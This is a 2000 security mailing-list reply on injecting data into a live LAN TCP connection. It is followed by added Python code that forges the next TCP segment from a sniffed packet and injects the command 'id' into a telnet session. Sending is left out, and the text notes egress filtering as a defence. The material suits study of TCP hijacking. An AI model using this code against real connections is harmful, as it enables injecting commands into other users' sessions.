Vulnerability Development mailing list archives

Re: Forge packets ?


From: "Samy Kamkar [CommPort5]" <CommPort5 () LUCIDX COM>
Date: Mon, 11 Sep 2000 21:29:28 +0100

Just sending packets (assuming there is a connection from your LAN which you're
able to sniff) with data without disconnecting connections should be pretty
simple.  No handshakes needed since the connection will still be open from the
local user...the local user will see it if (s)he sniffs the LAN's packets and
the remote host may echo the data which you sent, depending on the protocol.
You would need to sniff the packets which the local user is sending to the
remote host and then you'll need to create a packet matching what an outgoing
packet from the local user would look like (correct sequence number, window
size, etc.) and send it on its way...so it is possible.  There are also many
programs which already 'utilize' the local-net/TCP insecurities.  Not allowing
spoofed packets out (although it won't necessarily always be 'spoofed', could
be from the same hostname depending on how the LAN is set up) could stop
it...I'm not aware of the best way to stop this from happening, or how easy it
is to not allow spoofed packets out.


Skreel wrote:

So TCP hijacking is the solution?  I thought hunt could only hijack
connections on port 23.  What I actually want is to send data to the remote
host without dropping the user's connection, whether the user sees the data
or not (I'm only talking theoretically); I just wanted to know if it was
possible.  And also, if I used ipchains to IP-masquerade the LAN, then
wouldn't it be easier for an attacker to send data and hijack the user's
connection?  Is there any way to prevent this kind of attack (if it is a real
attack)?
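The forging step Samy describes (sniff the local user's outgoing segment, then build the next segment that user's stack would have sent, with the right sequence number, acknowledgement number and window) as an added, self-contained example; this is not code from the thread, hunt, or any tool mentioned. It parses a raw IPv4/TCP packet, advances the sequence number by the sequence space the observed segment consumed, copies ack and window, and recomputes both checksums. The "observed" packet is constructed inline for illustration, not a real capture; actually transmitting the result would need a raw socket (on Linux, IP_HDRINCL), which is deliberately left out so the block runs offline.

```python
import socket
import struct

# TCP flag bits (low 9 bits of the data-offset/flags word)
FIN, SYN, RST, PSH, ACK = 0x01, 0x02, 0x04, 0x08, 0x10


def checksum(data: bytes) -> int:
    """RFC 1071 ones'-complement sum over 16-bit words (0 when the field is included and valid)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def parse_ipv4_tcp(pkt: bytes) -> dict:
    """Extract the fields an injector needs from a sniffed IPv4/TCP packet."""
    ihl = (pkt[0] & 0x0F) * 4
    ip_id, ttl = struct.unpack("!H", pkt[4:6])[0], pkt[8]
    src, dst = pkt[12:16], pkt[16:20]
    tcp = pkt[ihl:]
    sport, dport, seq, ack, off_flags, win = struct.unpack("!HHIIHH", tcp[:16])
    doff = (off_flags >> 12) * 4
    return {
        "src": src, "dst": dst, "ip_id": ip_id, "ttl": ttl,
        "sport": sport, "dport": dport, "seq": seq, "ack": ack,
        "flags": off_flags & 0x1FF, "win": win, "payload": tcp[doff:],
    }


def build_ipv4_tcp(src, dst, sport, dport, seq, ack, flags, win, payload,
                   ip_id=0, ttl=64) -> bytes:
    """Serialize an IPv4 header plus an option-less TCP header with valid checksums."""
    tcp_len = 20 + len(payload)
    tcp = struct.pack("!HHIIHHHH", sport, dport, seq, ack,
                      (5 << 12) | flags, win, 0, 0)
    # TCP checksum covers the pseudo-header (addresses, protocol, TCP length) too
    pseudo = src + dst + struct.pack("!BBH", 0, socket.IPPROTO_TCP, tcp_len)
    tcp = tcp[:16] + struct.pack("!H", checksum(pseudo + tcp + payload)) + tcp[18:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + tcp_len, ip_id, 0x4000,
                     ttl, socket.IPPROTO_TCP, 0, src, dst)
    ip = ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:]
    return ip + tcp + payload


def checksums_ok(pkt: bytes) -> bool:
    """True when both the IP header and TCP checksums verify."""
    ihl = (pkt[0] & 0x0F) * 4
    tcp = pkt[ihl:]
    pseudo = pkt[12:16] + pkt[16:20] + struct.pack("!BBH", 0, socket.IPPROTO_TCP, len(tcp))
    return checksum(pkt[:ihl]) == 0 and checksum(pseudo + tcp) == 0


def forge_next_segment(observed: bytes, data: bytes) -> bytes:
    """Build the segment the local user's stack would send next, carrying our data.

    seq advances by the observed payload length, plus one each for SYN and FIN
    (they consume sequence space); ack, window, ports and addresses are copied.
    """
    f = parse_ipv4_tcp(observed)
    consumed = len(f["payload"]) + bool(f["flags"] & SYN) + bool(f["flags"] & FIN)
    next_seq = (f["seq"] + consumed) & 0xFFFFFFFF
    return build_ipv4_tcp(f["src"], f["dst"], f["sport"], f["dport"],
                          next_seq, f["ack"], PSH | ACK, f["win"], data,
                          ip_id=(f["ip_id"] + 1) & 0xFFFF, ttl=f["ttl"])


# Constructed sample (not a real capture): a telnet client on the LAN sending "ls".
OBSERVED = build_ipv4_tcp(socket.inet_aton("10.0.0.5"), socket.inet_aton("192.0.2.10"),
                          1025, 23, 1000, 5000, PSH | ACK, 8192, b"ls\r\n",
                          ip_id=0x1234, ttl=64)

if __name__ == "__main__":
    forged = forge_next_segment(OBSERVED, b"id\r\n")
    f = parse_ipv4_tcp(forged)
    print("seq", f["seq"], "ack", f["ack"], "payload", f["payload"], "checksums", checksums_ok(forged))
    # Sending is omitted on purpose; on Linux it would be a raw socket with
    # IP_HDRINCL: socket.socket(AF_INET, SOCK_RAW, IPPROTO_RAW).sendto(forged, (dst_ip, 0)).
```

The forged segment is accepted by the remote host because it sits exactly at the next expected sequence number for that connection. The price, which the thread touches on only indirectly, is that the real client's own next segment now arrives with a stale sequence number, so the two ends are out of step from that point; that is also what egress filtering of packets whose source address does not belong on the outgoing interface is meant to catch when the injector is not on the same host as the victim.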

